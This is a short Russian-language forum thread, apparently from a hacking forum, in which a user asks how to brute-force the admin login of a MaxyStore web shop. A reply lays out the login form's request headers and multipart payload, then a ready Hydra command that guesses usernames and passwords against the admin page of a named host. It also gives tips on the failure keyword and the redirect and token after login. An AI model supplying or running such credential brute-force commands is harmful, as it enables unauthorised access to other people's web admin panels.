Сообщение от
BUTUZ
↑
Подскажите пожалуйста, какая должна быть команда для брута http-админки MaxyStore?
Код:
HEADERS
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
User-Agent: runscope/0.1
QUERYSTRING
route: common/login
PARAMETERS
password: demo
username: demo
BODY
username=demo&password=demo
Вообще там Content-Type: multipart/form-data
Payload должен выглядеть как-то так
Код:
------WebKitFormBoundarypeTHmaEyYDJ1cZXG
Content-Disposition: form-data; name="username"
demo
------WebKitFormBoundarypeTHmaEyYDJ1cZXG
Content-Disposition: form-data; name="password"
demo
------WebKitFormBoundarypeTHmaEyYDJ1cZXG--
хз гидры нет под рукой, да и никогда небыло) нупримерно так по FAQ попробуй
Код:
$ hydra -L "logins path" -P "pass.txt path" http://2011.maxystore.ru/admin/index.php http-post-form "route=common/login:username=^USER^&password=^PASS:alert-danger"
p.s. alert-danger - invalid keyword (хз как в гидре, я указал кейворд тега.. ибо plain text там на русском весь, а юникод консоли не любят)
p.s.s. не забывай про редирект после отправки данных формы, и с редиректом выдается токен
p.s.s.s. почему именно гидра ?....